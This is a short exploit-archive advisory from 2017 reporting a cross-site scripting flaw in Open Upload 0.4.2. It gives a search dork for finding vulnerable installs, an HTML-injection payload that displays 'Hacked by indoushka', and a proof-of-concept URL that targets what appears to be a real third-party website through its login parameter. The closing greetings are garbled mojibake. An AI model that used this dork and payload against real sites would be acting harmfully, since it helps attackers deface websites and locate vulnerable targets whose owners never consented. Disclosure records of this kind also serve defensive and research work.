Open Upload 0.4.2 Cross Site Scripting
Posted on 29 December 2017
======================================================================== | # Title : Openupload 0.4.2 Xss vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 10 FranASSais V.(Pro) | # Version : 0.4.2 | # Vendor : http://wmscripti.com/ | # Dork : open upload - login ======================================================================== poc : [+] Dorking Adegn Google Or Other Search Enggine [+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee> https://ftp.televerbier.ch/index.php?action=login&lang=fr&step=1%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------ | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz | | ===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================
